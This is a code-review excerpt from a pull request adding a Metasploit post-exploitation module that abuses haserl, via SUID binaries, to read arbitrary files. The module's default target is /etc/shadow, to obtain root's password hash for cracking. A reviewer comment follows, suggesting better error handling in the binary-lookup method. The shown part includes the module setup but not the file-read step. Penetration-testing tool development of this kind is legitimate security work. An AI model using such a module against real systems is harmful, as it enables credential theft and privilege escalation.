modules/post/linux/gather/haserl_read.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Haserl Arbitrary File Reader',
+        'Description' => %q{
+          This module exploits haserl to read arbitrary files.
+          The most widely accepted exploitation vector is reading /etc/shadow,
+          which will reveal root's hash for cracking.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Julien (jvoisin) Voisin', # metasploit module
+          'Ike Broflovski' # discovery
+        ],
+        'Platform' => [ 'linux' ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'References' => [
+          ['URL', 'https://twitter.com/steaIth/status/1364940271054712842'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('RFILE', [true, 'File to read', '/etc/shadow']),
+    ])
+  end
+
+  def get_binary
+    files = begin
+      get_suid_files('/usr/bin')
+    rescue StandardError
+      fail_with(Failure::UnexpectedReply, 'Could not list /usr/bin/ directory contents')
+    end
```

Comment:
When this is called with from the `check` method, framework expects to be handed back a check code and not have an exception raised. One option could be to make this method return `nil` when it cannot find the file with the proper permissions and `check` can return `Exploit::CheckCode::Safe` and `run` can `fail_with`. Additionally, we will want to keep the error information around so that users can understand the context of what went wrong.
```suggestion
    rescue => e
      print_bad("Could not list /usr/bin/ directory contents: #{e}")
      return nil
    end
```